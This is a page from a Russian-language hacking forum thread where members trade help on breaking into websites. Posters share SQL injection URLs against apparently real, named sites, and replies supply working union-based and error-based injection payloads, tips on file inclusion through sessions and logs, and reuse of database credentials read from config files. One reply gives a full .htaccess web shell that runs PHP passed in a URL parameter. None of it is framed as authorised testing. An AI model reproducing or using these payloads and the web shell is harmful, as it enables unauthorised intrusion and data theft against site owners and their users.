Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    390
    Likes Received:
    39
    Reputations:
    23
    Все крутится

     
    1 person likes this.
  2. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Why does vulnerable number not showing?

    Code:
    http://safariestate.com.pk/details.php?id=-964 /*!uNiOn*/ /*!all*/ /*!SeleCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,248
    Likes Received:
    1,148
    Reputations:
    886
    http://safariestate.com.pk/details.php?id=964+and+false+/*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+
     
    _________________________
    1 person likes this.
  4. infoseller

    infoseller Member

    Joined:
    17 Aug 2011
    Messages:
    131
    Likes Received:
    13
    Reputations:
    0
    Code:
    http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&Itemid=55&type=0&cnid=0&stid=0&maxbed=&sold=0&featured=0&custom4=&custom5=&custom6=&custom7=&custom8=&pets=0&lug=&direction=DESCPRICE&min_squarefeet=&max_squarefeet=&postcode=&radius=&keyword=%27%2F*&cid=0&locid=0&minprice=&maxprice=&minbed=&bathrooms=&parking=&submit=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA
    Можно ли раскрутить? и как?
     
    #18644 infoseller, 17 Dec 2011
    Last edited by a moderator: 17 Dec 2011
  5. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    208
    Likes Received:
    63
    Reputations:
    34
    Привет,
    есть ли возможность узнать имя фотографии или атача на форуме vbulletin 3.8.4?
    Что интересного можно узнать, если есть возможность читать файлы. конфиг смотрел, бд локальная, пма немогу найти.
    ПС
    Дайте ссылку на пхпмайадмина хостинга infobox.ru
     
  6. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,022
    Likes Received:
    524
    Reputations:
    935
    скорее всего в твоем случае vbulletin хранит фотографии в базе а не в фс.
    как вариант можешь попробовать подключится с теми данными что ты прочитал в конфиге к 3306 порту (дефолтный порт mysql)
     
    _________________________
  7. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,582
    Likes Received:
    1,310
    Reputations:
    1,557
    wkar, тебе надо имя загруженного файла на сервере или имя файла, которое у него было на локальном компе во время загрузки на сервер?
    У тебя на компе картинка с аватара лежит(ала) в файле o4ad.gif
     
  8. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    208
    Likes Received:
    63
    Reputations:
    34
    Пробовал, не подключается, 61 ошибка.
    ПС
    хмм, я что-то забыл что можно инклюдить сессии%) Сейчас попробую:)

    2M_script, название файла не сервере, чтоб в дальнейшем его инклюдить.
     
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,022
    Likes Received:
    524
    Reputations:
    935
    Так у тебя читалка или инклуд?
     
    _________________________
  10. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    208
    Likes Received:
    63
    Reputations:
    34
    в одно скрипте читалка, в другом инклуд.
     
  11. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,582
    Likes Received:
    1,310
    Reputations:
    1,557
    http://help.infobox.ru/11-23
    Но что то не открывается этот поддомен.
     
    1 person likes this.
  12. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,022
    Likes Received:
    524
    Reputations:
    935
    Ну раз инклуд есть, то вариантов много, сессии, логи, временные файлы.
     
    _________________________
    1 person likes this.
  13. SecondLife

    SecondLife Elder - Старейшина

    Joined:
    8 May 2011
    Messages:
    29
    Likes Received:
    21
    Reputations:
    21
    Встретился интересный случай: есть возможность создать в папке файл .htaccess, но проблема в том, что в этой папке больше вообще ничего нет и создать в ней больше ничего невозможно.

    Апач файл обрабатывает, но что в него можно написать? Интересует заливка шелла/выполнение PHP команд/чтение файлов.

    Директивы логирования не доступны на уровне настроек, да и mod_rewrite не читаем файлы сам, а создаёт подзапрос, тем самым обламывая попытку использовать флаги вроде engine off.
     
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    Code:
    SELECT * FROM db WHERE bd1 like '%+order+by+10%00%'
    мой запрос в кавычках, как от этого избавиться?
     
    _________________________
  15. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,022
    Likes Received:
    524
    Reputations:
    935
    http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html

    создаешь .htaccess с таким содержимым:
    Code:
    <Files ~ "^\.ht">
    Order allow,deny
    Allow from all
    </Files>
    AddType application/x-httpd-php .htaccess
    #<?php eval($_GET['e']);?>
    и вызываешь так: site.com/.htaccess?e=phpinfo();


    нужно как минимум поставить одинарную кавычку:
    SELECT * FROM db WHERE bd1 like '%' order by 100#'
     
    _________________________
    #18655 Expl0ited, 18 Dec 2011
    Last edited: 18 Dec 2011
    2 people like this.
  16. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Например так
    Code:
    http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&keyword=1')/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)or/**/('1
     
    2 people like this.
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    Expl0ited, спасибо
    запрос схавал, правда реакции нет
    http://www.usvieda.org/search.php
    уязвимо поле поиска.
     
    _________________________
  18. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,022
    Likes Received:
    524
    Reputations:
    935
    слоит 'and(select(max(1))from(information_schema.columns)group by(concat(version(),0x00,floor(rand(0)*2))))#
     
    _________________________
    2 people like this.
  19. Breetonia

    Breetonia New Member

    Joined:
    11 Dec 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Как можно выбрать данные из бд mysql,в имени которой стоит точка ? Сервер ведь интерпретирует вторую половину имени бд как имя таблицы,а не имя бд,поэтому запросы и не проходят ( сиптом получил все таблицы в бд,а с содержимым - облом )
     
  20. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,022
    Likes Received:
    524
    Reputations:
    935
    SELECT * FROM `database`.`table.name`
     
    _________________________
Thread Status:
Not open for further replies.